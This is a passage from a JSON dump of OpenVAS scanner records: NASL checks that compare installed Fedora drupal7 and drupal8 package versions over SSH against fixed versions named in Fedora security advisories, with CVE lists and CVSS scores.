script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-16T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-8fd924a53d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874456", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874456", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_8fd924a53d_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-8fd924a53d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874456\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-16 05:53:29 +0200 (Wed, 16 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-8fd924a53d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-8fd924a53d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OKWJWSEKSJJSQ7G5K3DVNXGLB44LQX64\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-03-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-6a0717dc9a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875500", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875500", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875500\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-08 04:12:02 +0100 (Fri, 08 Mar 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-6a0717dc9a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-6a0717dc9a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal8' package(s) announced via the FEDORA-2019-6a0717dc9a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.10~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-2359c2ae0e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874428", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874428", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2359c2ae0e_drupal7_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874428\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 06:06:46 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\", \"CVE-2017-6922\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2359c2ae0e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-7d748596e9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310814523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7d748596e9_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-7d748596e9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814523\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:19:36 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-7d748596e9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d748596e9\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZGZBSHQC6C3WLIATUZXNKC3DB73ADIXZ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2018-7d748596e9 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-1ba93b3144", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874422", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874422", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1ba93b3144_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-1ba93b3144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874422\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 05:59:57 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-1ba93b3144\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1ba93b3144\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L2NHXS355OJ7C7ZEAGKMOPFWU6SUYYUV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.8~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-79bd99f9a8", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-6341", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875534", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875534\");\n script_version(\"2019-04-03T06:51:54+0000\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:51:54 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-79bd99f9a8\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-79bd99f9a8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-79bd99f9a8 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.13~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-6e6d8c314b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874382", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874382", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_6e6d8c314b_drupal8_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874382\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:05 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6928\", \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-6e6d8c314b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-6e6d8c314b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XWSND764JDPO7QHXKOFVZCECOMLR3N6L\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.4.6~3.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7600", "CVE-2019-10911", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2019-10910", "CVE-2019-10909", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310876320", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876320", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876320\");\n script_version(\"2019-05-17T10:04:07+0000\");\n script_cve_id(\"CVE-2019-10909\", \"CVE-2019-10910\", \"CVE-2019-10911\", \"CVE-2019-11358\", \"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 